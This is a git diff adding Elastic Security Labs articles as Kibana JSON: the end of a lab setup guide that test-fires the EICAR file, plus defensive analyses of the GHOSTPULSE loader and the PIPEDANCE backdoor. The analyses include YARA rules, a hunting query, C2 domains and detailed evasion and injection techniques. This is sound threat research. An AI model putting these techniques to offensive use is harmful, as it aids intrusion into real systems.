can click the blue Save integration button.\n\n## Enabling Elastic’s Prebuilt Detection Rules\n\nNow that we have created our Fleet agent policy, we need to enable the set of pre-built detection rules associated with the OS or platform we will be deploying on (e.g., Windows). 
To do this, you will need to go to the Alerts page within the security app.\n\nClick on the hamburger menu and select Alerts, under the Security solution.\n\n\n\nNext, click on the blue Manage Rules button.\n\n\n\nOnce on the Rules page, you can update all of the prebuilt rules provided by Elastic by clicking on the “Update Elastic prebuilt rules” button. The update framework is enabled when you go into the “Manage rules” section for the first time; if the “Update Elastic prebuilt rules” button isn’t present, refresh the screen.\n\n\n\nOnce the rules have been updated, you can browse the available detection rules, search them by a number of different patterns, or simply filter by tag, which is what we will do here by searching for Windows rules.\n\n\n\nNow we can select all of the Windows rules.\n\n\n\nOnce all of the rules have been selected, we can bulk enable them.\n\n\n\n> As the Elastic Container Project runs completely inside single Docker containers, performance impacts could be noticed if you enable all of the rules available. Explore the different rules and enable or disable them based on your infrastructure and use cases.\n\nAfter we have enabled these rules, they will be live and will be run against the data your endpoint agent sends into your stack. When the Detection Engine rules are triggered, they will be raised in the Alerts page in the Security Solution.\n\n## Enrolling an Elastic Agent\n\nStill in Fleet, we have several ways to add an Elastic Agent. The most straightforward is from within the policy that we want to enroll an Elastic Agent into (otherwise you have to specify which policy you want to use). 
It doesn’t really matter which approach you use, but clicking on the Actions button and then Add agent works from just about anywhere in Fleet.\n\n\n\nScroll down and click on the OS that you’re going to be installing the Elastic Agent on, and copy/paste the instructions directly into a terminal window on the host you’re going to be installing the agent onto. Note: if you’re using Windows, use a PowerShell CLI that is running as (or elevated to) an account with administrative entitlements.\n\n\n\nOf note, because all of our TLS certificates are self-signed, we need to append the **--insecure** flag. This is unnecessary if you are using trusted certificates.\n\n```\n**.\\elastic-agent.exe install --url=https://[stack-ip]:8220 --enrollment-token=[token] --insecure**\n```\n\n\n\nBack in Kibana, we can see confirmation that the Elastic Agent installed on the host and that data is being recorded into Elasticsearch.\n\n\n\nWe can see that the Elastic Agent is reporting into Fleet and is healthy.\n\n\n\nIf we go into the Discover tab, we can see various event types reporting into Elasticsearch. We can generate some test data by opening **notepad.exe** , **calc.exe** , and **ping.exe -t www.elastic.co** on the host. From Discover, we can make a simple query to validate that we’re seeing the data:\n\n```\n**process.name.caseless : (notepad.exe or ping.exe or calc.exe)**\n```\n\n\n\nNow that we’ve validated that we’re seeing data, let's fire some malware!\n\n## Test fire some malware\n\nThere are a lot of places you can download malware from, but for this test, we’ll simply use the industry-standard [EICAR anti malware test file](https://www.eicar.org/download-anti-malware-testfile/) to check the functionality.\n\nThe EICAR test is a file that is universally identified by security vendors and is used to test the operation of anti malware software and platforms. 
It contains a single string and is non-malicious.\n\nFrom within the Windows host, we’ll use PowerShell to download the EICAR file.\n\n```\n**Invoke-WebRequest -Uri \"https://secure.eicar.org/eicar.com.txt\" -OutFile \"eicar.txt\"**\n```\n\nAs expected, the event was immediately identified by the Elastic Agent’s security integration.\n\n\n\nAfter a few minutes, the events are recorded into the Security Solution within Kibana. You can get there by clicking on the hamburger menu and then clicking on the Alerts section.\n\n\n\nHere we can see the alert populated.\n\n\n\nIf we click on the Analyzer button, we can dig into the event to identify the process that generated the event.\n\n\n\nIn our example, we can see **powershell.exe** generated the event, and this includes the correlated network events - **secure.eicar.org** , which is where the EICAR test file was downloaded from.\n\n\n\n## Summary\n\nIn this publication, we introduced you to the Elastic Stack and an open source project that can be used to quickly and securely stand up the entire stack for testing, labs, and security research.\n\nKibana and the Security Solution are powerful tools that are built by incident responders, threat hunters, and intelligence analysts with security practitioners in mind. To learn more about how to use these tools, [Elastic has some great (free and paid) training](https://www.elastic.co/training/) that can help you learn how to use Kibana for threat hunting.\n"
+ },
+ "title": "The Elastic Container Project for Security Research",
+ "slug": "the-elastic-container-project",
+ "subtitle": "Using Docker to stand up the Elastic Stack",
+ "date": "2023-03-01",
+ "description": "The Elastic Container Project provides a single shell script that will allow you to stand up and manage an entire Elastic Stack using Docker. This open source project enables rapid deployment for testing use cases.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "colson-wilhoit"
+ },
+ {
+ "slug": "derek-ditch"
+ }
+ ],
+ "image": "blog-thumb-container-barge.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-the_elastic_container_project-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-tricks_and_treats-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-tricks_and_treats-md.json
new file mode 100644
index 00000000000..982aaefdc0b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-tricks_and_treats-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Tricks and Treats: GHOSTPULSE’s new pixel-level deception\"\nslug: \"tricks-and-treats\"\ndate: \"2024-10-19\"\ndescription: \"The updated GHOSTPULSE malware has evolved to embed malicious data directly within pixel structures, making it harder to detect and requiring new analysis and detection techniques.\"\nauthor:\n - slug: salim-bitam\nimage: \"tricks-and-treats.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ghostpulse\n - lummastealer\n - ref8207\n---\n\n## Update\n\nThis research covers an update to stage 2 of GHOSTPULSE, [originally disclosed](https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks#stage-2) by Elastic Security Labs in October 2023.\n\n## Key takeaways\n\n1. GHOSTPULSE has shifted from using the IDAT chunk of PNG files to embedding its encrypted configuration and payload within the pixel structure.\n1. Recent campaigns involve tricking victims with creative social engineering techniques, such as CAPTCHA validations that trigger malicious commands through Windows keyboard shortcuts.\n1. Elastic Security has enhanced its YARA rules and updated the configuration extractor tool to detect and analyze both the old and new versions of GHOSTPULSE.\n\n## Preamble\n\nThe GHOSTPULSE malware family (also known as HIJACKLOADER or IDATLOADER) has continuously evolved since its discovery in 2023, evading detection with increasingly sophisticated techniques.\n\nIn its earlier iterations, GHOSTPULSE abused the IDAT chunk of PNG files to hide malicious payloads, as detailed in a [previous article from Elastic Security Labs](https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks). However, recent analysis has uncovered a significant change in its algorithm. Instead of extracting the payload from the IDAT chunk, the latest version of GHOSTPULSE now parses the pixels of the image to retrieve its configuration and payload. 
This new approach involves embedding malicious data directly within the pixel structure.\n\nIn this research publication, we’ll explore this new pixel-based algorithm and compare it with the previous IDAT chunk technique with updated detection rules.\n\n## Introduction\n\nRecently, we've observed several campaigns involving LUMMA STEALER using GHOSTPULSE as its loader, a topic also explored by [HarfangLab](https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/). These campaigns stand out due to their [creative social engineering tactics](https://www.secureworks.com/blog/fake-human-verification-prompt-delivers-infostealers). Victims are tricked into validating a CAPTCHA, but the website instructs them to execute a series of Windows keyboard shortcuts instead of the usual process. These shortcuts trigger a command copied to the clipboard by malicious JavaScript. This leads to a PowerShell script being executed, initiating the infection chain by downloading and executing a GHOSTPULSE payload.\n\n\n\nIn previous versions of GHOSTPULSE, it was delivered as part of a multi-file package. This package typically contained a benign executable, an infected DLL loaded by the executable, and a PNG file storing the encrypted configuration.\n\nHowever, in the latest version, GHOSTPULSE has streamlined its deployment. Now, the entire package consists of a single file—a benign but compromised executable that includes the PNG file within its resources section.\n\n\n\n## Technical analysis\n\nThe updated second stage of the malware retains much of its previous structure, including using the same hashing algorithm for resolving Windows API names. 
However, the most significant change is in how the malware now locates its configuration, which holds both the payload and critical instructions for its deployment.\n\nThe following is a screenshot showing the pseudocode of both implementations:\n\n\n\nIn earlier versions, GHOSTPULSE would parse a PNG file for an encrypted data blob, which was divided into chunks and stored sequentially. The malware’s parsing process was straightforward: it would search for a specific marker within the file—in this case, the IDAT string. Once found, the malware would check for a 4-byte tag that followed the string. The encrypted chunk would be extracted if this tag matched the expected value. This process was repeated for every subsequent occurrence of the IDAT string until the full encrypted payload was collected.\n\nIn the new version, the encrypted configuration is stored in the pixels of the image. The malware constructs a byte array by extracting each pixel's `RED`, `GREEN`, and `BLUE` (RGB) values sequentially using standard Windows APIs from the [GdiPlus(GDI+)](https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-gdi-start) library. Once the byte array is built, the malware searches for the start of a structure that contains the encrypted GHOSTPULSE configuration, including the XOR key needed for decryption. It does this by looping through the byte array in 16-byte blocks. For each block, the first 4 bytes represent a CRC32 hash, and the next 12 bytes are the data to be hashed. The malware computes the CRC32 of the 12 bytes and checks if it matches the hash. If a match is found, it extracts the offset of the encrypted GHOSTPULSE configuration, its size, and the 4-byte XOR key, and then XOR decrypts it.\n\nThe following diagram provides a visual breakdown of this process:\n\n\n\n## Updated configuration extractor\n\nBased on these findings, we have updated our configuration extractor to support both versions of GHOSTPULSE. 
This tool takes a PNG file as input and outputs the embedded payload. You can find the updated tool in our [labs-releases repository](https://github.com/elastic/labs-releases/tree/main/tools/ghostpulse).\n\n\n\n## Detecting GHOSTPULSE with YARA\n\nThe original [GHOSTPULSE YARA](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostPulse.yar) rule still prevents the final stage of an infection and is built into Elastic Defend. The updated sample can be detected using the following YARA rules and will be included with Elastic Defend in a future release.\n\nElastic Security has updated the GHOSTPULSE YARA rules to identify this activity:\n\n```\nrule Windows_Trojan_GHOSTPULSE_1 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-10-15\"\n last_modified = \"2024-10-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"GHOSTPULSE\"\n threat_name = \"Windows.Trojan.GHOSTPULSE\"\n license = \"Elastic License v2\"\n\n strings:\n $stage_1 = { 49 63 D0 42 8B 0C 0A 41 03 CA 89 0C 1A 8B 05 ?? ?? ?? ?? 44 03 C0 8B 05 ?? ?? ?? ?? 
44 3B C0 }\n $stage_2 = { 48 89 01 48 8B 84 24 D8 00 00 00 48 8B 4C 24 78 8B 49 0C 89 08 C7 44 24 44 00 00 00 00 }\n\n condition:\n any of them\n}\n\nrule Windows_Trojan_GHOSTPULSE_2 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-10-10\"\n last_modified = \"2024-10-10\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"GHOSTPULSE\"\n threat_name = \"Windows.Trojan.GHOSTPULSE\"\n license = \"Elastic License v2\"\n\n strings:\n $a1 = { 48 83 EC 18 C7 04 24 00 00 00 00 8B 04 24 48 8B 4C 24 20 0F B7 04 41 85 C0 74 0A 8B 04 24 FF C0 89 04 24 EB E6 C7 44 24 08 00 00 00 00 8B 04 24 FF C8 8B C0 48 8B 4C 24 20 0F B7 04 41 83 F8 5C }\n\n condition:\n all of them\n}\n```\n\n## Conclusion\n\nIn summary, the GHOSTPULSE malware family has evolved since its release in 2023, with this recent update marking one of the most significant changes.\n\nAs attackers continue to innovate, defenders must adapt by utilizing updated tools and techniques to mitigate these threats effectively. We are excited to share our newly developed configuration extractor tool, designed to analyze the older and newer versions of GHOSTPULSE. This tool empowers researchers and cybersecurity professionals by providing enhanced capabilities for understanding and combating these evolving threats. 
As the landscape of cyber threats changes, collaboration, and innovation remain essential for effective protection.\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostpulse) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-------------|-----------------|------------------------------------------|\n| `57ebf79c384366162cb0f13de0de4fc1300ebb733584e2d8887505f22f877077` | SHA-256 | `Setup.exe` | GHOSTPULSE sample |\n| `b54d9db283e6c958697bfc4f97a5dd0ba585bc1d05267569264a2d700f0799ae` | SHA-256 | `Setup_light.exe` | GHOSTPULSE sample |\n| `winrar01.b-cdn[.]net` | domain-name | | Infrastructure hosting GHOSTPULSE sample |\n| `reinforcenh[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `stogeneratmns[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `fragnantbui[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `drawzhotdog[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `vozmeatillu[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `offensivedzvju[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `ghostreedmnu[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `gutterydhowi[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `riderratttinow[.]shop` | domain-name | | LUMMASTEALER C2 |"
+ },
+ "title": "Tricks and Treats: GHOSTPULSE’s new pixel-level deception",
+ "slug": "tricks-and-treats",
+ "date": "2024-10-19",
+ "description": "The updated GHOSTPULSE malware has evolved to embed malicious data directly within pixel structures, making it harder to detect and requiring new analysis and detection techniques.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "tricks-and-treats.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ghostpulse",
+ "lummastealer",
+ "ref8207"
+ ]
+ },
+ "id": "security_labs_content-tricks_and_treats-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-twice_around_the_dance_floor_with_pipedance-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-twice_around_the_dance_floor_with_pipedance-md.json
new file mode 100644
index 00000000000..d7c312c78a4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-twice_around_the_dance_floor_with_pipedance-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Twice around the dance floor - Elastic discovers the PIPEDANCE backdoor\"\nslug: \"twice-around-the-dance-floor-with-pipedance\"\ndate: \"2023-02-27\"\nsubtitle: \"Elastic Security Labs describes the PIPEDANCE backdoor\"\ndescription: \"Elastic Security Labs is tracking an active intrusion into a Vietnamese organization using a recently discovered triggerable, multi-hop backdoor we are calling PIPEDANCE. This full-featured malware enables stealthy operations through the use of named\"\nauthor:\n - slug: daniel-stepanic\nimage: \"photo-edited-12@2x.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ref1326\n - pipedance\n---\n\n## Key takeaways\n\n- Elastic Security Labs has identified PIPEDANCE, a previously unknown Windows backdoor used to enable post-compromise and lateral movement activities\n- Built for stealthy operations through named pipes, PIPEDANCE employs capabilities for interactive terminals, discovery/file enumeration, process injection, and data exfiltration checks\n- PIPEDANCE was observed deploying Cobalt Strike\n\n## Preamble\n\nIn late December 2022, Elastic Security Labs observed new activity in a previously monitored environment targeting a Vietnamese organization. This new activity included the execution of a named pipe malware used to facilitate post-compromise activity. We are naming this malware family PIPEDANCE. 
By leveraging PIPEDANCE, the adversary is able to:\n\n- Disguise activity through a custom function that randomly injects into a hard-coded list of Windows programs\n- Perform discovery by enumerating files and processes\n- Leverage standard backdoor capabilities such as running commands, writing files\n- Check different network protocols for exfiltration\n- Launch additional payloads through process injection techniques\n\nIn this post, we walk through the initial execution then detail the capabilities we have discovered from reviewing the malware.\n\nNote: Check out our follow-on publication on creating your own client to interact with a PIPEDANCE infected endpoint [here](https://www.elastic.co/security-labs/dancing-the-night-away-with-named-pipes).\n\n## Overview\n\nUnlike malware that might communicate with conventional network or application protocols, we identified a binary designed explicitly for lateral movement and post-compromise enablement within a contested environment: executing additional implants, running commands, performing file discovery, enumerating running processes, and checking outbound access; all through the use of Windows named pipes. This kind of functionality is comparable to Cobalt Strike or Metasploit’s SMB modules.\n\n> [Named pipes](https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes) within Windows allow for inter-process communication on a single computer or between processes on separate machines within the same network. Named pipes can be set up for one-way or two-way communication between a pipe client and a pipe server. The data used within named pipes are all stored in memory where it is written and retrieved using standard Windows APIs ( **CreateFile** / **WriteFile** / **ReadFile** ) in the same way as reading/writing files.\n\n[Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) was installed after an unknown initial compromise. 
The [Suspicious Windows Service Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_suspicious_windows_service_execution.toml) behavioral rule generated the first observed events. While unconfirmed, [published research](https://www.microsoft.com/en-us/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/) describes similar techniques by an adversary leveraging execution through a locally-mounted Administrator share and using [Microsoft’s SysInternals DebugView](https://learn.microsoft.com/en-us/sysinternals/downloads/debugview) ( **DbgView.exe** ) utility to load PIPEDANCE.\n\n**DbgView.exe** was observed loading PIPEDANCE into [**makecab.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/makecab), the Windows utility used to package Cabinet files **.** The Windows performance data utility, [**typeperf.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/typeperf), was then injected into and spawned [**openfiles.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/openfiles) where Cobalt Strike was loaded into this process.\n\nWhile **openfiles.exe** binary is a legitimate Microsoft application, Elastic Defend generated a Cobalt Strike memory signature. After extracting the memory regions from the alert in Kibana, we identified the Cobalt Strike module [**invokeassembly.x64.dll**](https://twitter.com/_RastaMouse/status/1104282852869525506?s=20&t=0_v846VUU-A0lE2gxgN_bg), validating that Cobalt Strike was injected into the legitimate **openfiles.exe** binary.\n\n\n\nPIPEDANCE leverages named pipes as a communication mechanism between different infected endpoints within a compromised network. 
The adversary uses this capability as a bidirectional layer of command and control through which they can dispatch commands and pass data between named pipes.\n\n## Initial set-up / Communication flow\n\nAt the beginning of the main function, there is a hardcoded string used as the pipe name. This string is also used in later stages as an RC4 key to encrypt/decrypt data between pipes. In the image below, we can see the hardcoded pipe name ( **u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe** ) being set as a global variable.\n\n\n\nDuring initial execution, the malware will use the **CreateNamedPipeA** and **ConnectNamedPipe** methods to create the named pipe ( **“\\\\.\\pipe\\u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe**\") and wait for an incoming client process to connect to the pipe. The figure below represents this activity showing the pipe name being formatted with hardcoded string and initializing the pipe.\n\n\n\nDuring the first client connection, PIPEDANCE retrieves the following values from the local system and places them into a buffer:\n\n- Process ID of the PIPEDANCE process\n- Current working directory of the PIPEDANCE process.\n- Domain & Username of the PIPEDANCE process\n\nPIPEDANCE passes this buffer and an 8-byte structure containing the result flag from a **IsWow64Process** evaluation and the buffer size for the subsequent **WriteFile** operation to the pipe. PIPEDANCE then encrypts the buffer containing the previous process details with RC4 and then writes the encrypted data back to the client pipe.\n\n\n\nBelow is a high-level graphic that illustrates the purpose-built lateral movement functionality. With PIPEDANCE infections, the named pipe server process is run on a new victim machine, while the client instructions come from the operator from a previously compromised machine in the same network.\n\n\n\n### Command dispatching\n\nAfter an initial handshake, PIPEDANCE’s primary functionality consists of a while loop with a command dispatching function. 
This dispatching function will retrieve the provided command ID of its respective function along with any arguments and their size from the operator.\n\n\n\nThe parsing function passes an 8-byte structure consisting of the command instruction and the buffer size for the command argument. The command argument is decrypted using the previous RC4 key, then written back to the pipe.\n\n\n\nOnce the command ID has been received, PIPEDANCE performs several conditional checks using if/else and switch statements.\n\n\n\nThe majority of the command functions return a result flag or error code to the operator. For some functions that may return large amounts of data, such as a list of running processes, the malware generates a new named pipe using the hardcoded string described earlier. Then it concatenates the PID of the PIPEDANCE process which sends and receives the data over this pipe.\n\n\n\n## Command functionality\n\nPIPEDANCE supports more than 20 different functions, each accessed using their command ID via if/then and switch/case logic. 
Below is an example of the first 4 functions.\n\n\n\n### Command handling table\n\n| Command ID | Description |\n| ---------- | ---------------------------------------------------------------------------------------------------- |\n| 0x1 | Terminates process based on provided PID |\n| 0x2 | Run a single command through cmd.exe, returns output |\n| 0x3 | Terminal shell using stdin/stdout redirection through named pipes |\n| 0x4 | File enumeration on current working directory |\n| 0x6 | Create a new file with content from pipe |\n| 0x7 | Retrieve current working directory |\n| 0x8 | Set current working directory |\n| 0x9 | Get running processes |\n| 0x16 | Perform injection (thread hijacking or Heaven’s Gate) with stdin/stdout option for the child process |\n| 0x18 | Perform injection from hardcoded list (thread hijacking or Heaven’s Gate) |\n| 0x1A | Perform injection on provided PID (thread hijacking or Heaven’s Gate) |\n| 0x3E | Clear out global variable/pipe data |\n| 0x47 | Connectivity check via HTTP Get Request |\n| 0x48 | Connectivity check via DNS with providing DNS Server IP |\n| 0x49 | Connectivity check via ICMP |\n| 0x4A | Connectivity check via TCP |\n| 0x4B | Connectivity check via DNS without providing DNS Server IP |\n| 0x63 | Disconnect pipe, close handle, exit thread |\n| 0x64 | Disconnect pipe, close handle, exit process, exit thread |\n\nIn order to detail the significant capabilities of PIPEDANCE, we’ve split our analysis into three sections:\n\n- Standard backdoor functionality\n- Network connectivity checks\n- Process Injection techniques\n\n### Backdoor functionality\n\nPIPEDANCE offers various interactive backdoor capabilities needed by an operator in order to perform reconnaissance, and pivot through different systems.\n\n#### Command execution\n\nThere are two functions related to command execution, **Function 0x2** and **0x3**. The first method ( **Function 0x2** ) accepts a command argument from the terminal, such as **ipconfig**. 
This function starts by creating an anonymous named pipe with read and write handles. Before creating the process, PIPEDANCE will configure the **STARTUPINFO** structure using **STARTF_USESTDHANDLES** to pipe the command output ( **hStdOutput** ) for the new process.\n\n\n\nA thread is then created passing the previous read pipe handle as an argument. Memory is allocated for the command output and read from this read pipe handle. The data is then looped over and encrypted in a similar manner as before and sent back through a new named pipe. In our example, this is the data from the **ipconfig** command.\n\n\n\nThe second execution command ( **Function 0x3** ) creates a new **cmd.exe** process in a suspended state and also leverages **STARTF_USESTDHANDLES** as before.\n\n\n\nAfter the process is created, a new thread is created passing the **STARTUPINFO** where two named pipe server processes are created for input and output and the thread is resumed.\n\n\n\nThis functionality operates similarly to a reverse shell, where the attacker has the ability to directly interact and pass data back and forth.\n\n#### Discovery and enumeration\n\nPIPEDANCE has built-in functionality related to discovery and enumeration. For process enumeration ( **Function 0x9** ), it leverages the **CreateToolhelp32Snapshot** function to retrieve the process details. The function returns the process ID, the name of the process, the architecture of the process, whether a process is tied to a system (Session represented as a **0** ) or user session (Session represented as a **1** ), and the username associated with the process.\n\n\n\nInterestingly, in our observations with a few different modules, the results are mangled by the developer due to formatting the data with the C runtime library function **vsprintf_s** when working with Unicode data. 
This can be observed below in the process discovery module where the process name output gets mangled whereas PIPEDANCE only returns the first character of the process, architecture, and usernames. Below is the output table returned to the operator. In this example, PID **564** with a (mangled) “Name” of **w** is actually PID **564** with a full process name of **winlogon.exe** , a full architecture name of **x86** , a session ID of **1** , and a full user name of **NT AUTHORITY\\SYSTEM** , etc.\n\n\n\nPIPEDANCE implements a terminal-like concept where it has a current or working directory for its process. This enables the adversary to use functions directly tied to the working directory, such as the file enumeration modules.\n\nFor file enumeration, PIPEDANCE will use a wildcard to pull back a file listing from the current working directory.\n\n\n\nPIPEDANCE also offers functionality for creating files and writing content to files on the victim machine ( **Function 0x6** ). It does this by first creating and naming a file on the victim machine, then it creates a new thread with a new instance of a named pipe that will then wait for and read incoming data over the pipe. This data is XOR’d with the previous RC4 key and then written to the file.\n\n\n\nPIPEDANCE also has various administrator or maintenance commands used to terminate processes, terminate threads, disconnect pipes, clear global variables from memory, etc.\n\n### Network connectivity checks\n\nAs adversaries pivot and move through a network, one of their objectives is understanding where the endpoint sits inside the network and determining what protocols are available for shipping data laterally or externally. 
PIPEDANCE is specifically built to identify exit points on an endpoint by checking DNS, ICMP, TCP, and HTTP protocols.\n\n\n\nAs an example, PIPEDANCE will make a DNS request to bing[.]com when providing a DNS server as an argument, the result of the query will be returned back to the operator indicating success or not. For ICMP, PIPEDANCE will generate fake data for the ICMP request by looping over the alphabet and sending it to a provided IP address.\n\n\n\n\n\nSimilarly for HTTP, the operator can provide a domain where PIPEDANCE will perform a vanilla HTTP GET request over port 80 and then return a boolean value for success or not.\n\n\n\nThese are straightforward functions, but they provide great insight into the developer’s mindset and the type of objectives they are trying to achieve. These checks are likely used in a multi-stage process where these protocols are verified first in a lightweight method then additional shellcode/payloads are launched afterward.\n\n### Process injection techniques\n\nIn a similar fashion to many post-exploitation frameworks, PIPEDANCE leverages different forms of process injection to execute shellcode and launch additional implants. Depending on the process architecture, the malware will perform injection using a standard thread execution hijacking technique or the [Heaven’s Gate technique](https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/).\n\n\n\nPIPEDANCE utilizes defense evasions to obscure their activity by randomly picking a Windows program from a hardcoded list to use as an injection target.\n\nThis method generates a seed value based on the current time and passes it to a pseudorandom number generator that returns a value between 0 and 5. 
This value determines which of 6 hard-coded binaries ( **makecab.exe** , **typeperf.exe** , **w32tm.exe** , **bootcfg.exe** , **diskperf.exe** , **esentutl.exe** ) is used.\n\n\n\nBelow is an example of the Windows APIs used with the thread hijacking technique when PIPEDANCE is running under a 32-bit architecture.\n\n\n\nIf the processor architecture is 64-bit, PIPEDANCE will use the Heaven’s Gate technique calling Native API functions ( **NtGetContextThread** , **NtWriteVirtualMemory** , **RtlCreateUserThread** ), switching the CPU to 64-bit, and executing shellcode.\n\n\n\n\n\nPIPEDANCE also supports other methods of injection using **CreateRemoteThread** or through a Heaven’s Gate call to **RtlCreateUserThread**. With this function, instead of choosing from the previously hardcoded list, the operator provides the PID for the injection target.\n\n\n\n## Summary\n\nPIPEDANCE is designed to conduct covert operations using named pipes and has various features to enable the post-compromise stage. In terms of capabilities, it reminds us of an offensive attack framework's SMB module, but with its own customization. 
While leveraging named pipes is not a novel technique, it's interesting to see how it's been implemented as a command and control internal proxy and represents an in-house development capability.\n\n## Detection logic\n\n### Prevention\n\n- Memory Threat Prevent Alert: Shellcode Injection\n\n### Detection\n\n- [Suspicious Windows Service Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/privilege_escalation_suspicious_windows_service_execution.toml)\n- [NullSessionPipe Registry Modification](https://www.elastic.co/guide/en/security/current/nullsessionpipe-registry-modification.html)\n- [Potential Lateral Tool Transfer via SMB Share](https://www.elastic.co/guide/en/security/master/potential-lateral-tool-transfer-via-smb-share.html)\n\n#### Hunting queries\n\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n##### KQL queries\n\nUsing the Discover app in Kibana, the below query will identify network connections coming from the hardcoded injection targets within PIPEDANCE.\n\n```\nprocess.name:(\"makecab.exe\" or \"typeperf.exe\" or \"w32tm.exe\" or \"bootcfg.exe\" or \"diskperf.exe\" or \"esentutl.exe\") and event.dataset: endpoint.events.network\n```\n\n#### YARA\n\nElastic Security has created a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PipeDance.yar) to identify this activity. 
Below is the YARA rule to identify PIPEDANCE.\n\n```\nrule Windows_Trojan_PipeDance {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-02-02\"\n last_modified = \"2023-02-02\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"PipeDance\"\n threat_name = \"Windows.Trojan.PipeDance\"\n license = \"Elastic License v2\"\n strings:\n $str1 = \"%-5d %-30s %-4s %-7d %s\" wide fullword\n $str2 = \"PID Name Arch Session User\" wide fullword\n $str3 = \"%s %7.2f B\" wide fullword\n $str4 = \"\\\\\\\\.\\\\pipe\\\\%s.%d\" ascii fullword\n $seq_rc4 = { 8D 46 ?? 0F B6 F0 8A 14 3E 0F B6 C2 03 C1 0F B6 C8 89 4D ?? 8A 04 0F 88 04 3E 88 14 0F 0F B6 0C 3E 0F B6 C2 03 C8 0F B6 C1 8B 4D ?? 8A 04 38 30 04 0B 43 8B 4D ?? 3B 5D ?? 72 ?? }\n $seq_srv_resp = { 8B CE 50 6A 04 5A E8 ?? ?? ?? ?? B8 00 04 00 00 8D 4E ?? 50 53 8B D0 E8 ?? ?? ?? ?? B8 08 02 00 00 8D 8E ?? ?? ?? ?? 50 57 8B D0 E8 ?? ?? ?? ?? }\n $seq_cmd_dispatch = { 83 FE 29 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE 06 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 33 D2 2B C2 0F 84 ?? ?? ?? ?? 83 E8 01 }\n $seq_icmp = { 59 6A 61 5E 89 45 ?? 8B D0 89 5D ?? 2B F0 8D 04 16 8D 4B ?? 88 0A 83 F8 77 7E ?? 80 E9 17 88 0A 43 42 83 FB 20 }\n condition:\n 4 of ($str*) or 2 of ($seq*)\n}\n```\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. 
